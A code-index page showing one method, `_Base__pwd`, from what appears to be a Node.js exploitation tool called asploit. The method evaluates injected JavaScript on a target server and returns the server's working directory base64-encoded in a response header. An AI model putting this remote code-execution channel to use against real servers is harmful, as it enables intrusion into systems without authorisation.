MCPcopy Create free account
hub / github.com/Geeoon/asploit / _Base__pwd

Method _Base__pwd

src/NodeExploitProcessor.py:117–121  ·  view source on GitHub ↗
(self, options: str)

Source from the content-addressed store, hash-verified

115 @brief See base class for details.
116 """
117 def _Base__pwd(self, options: str):
118 out = self.__eval(f"r.setHeader('{self.header}', "
119 f"Buffer.from(process.cwd()).toString('base64'));"
120 f"r.end();")
121 print(base64.b64decode(out).decode())
122
123 """
124 @brief See base class for details.

Callers

nothing calls this directly

Calls 1

__evalMethod · 0.95

Tested by

no test coverage detected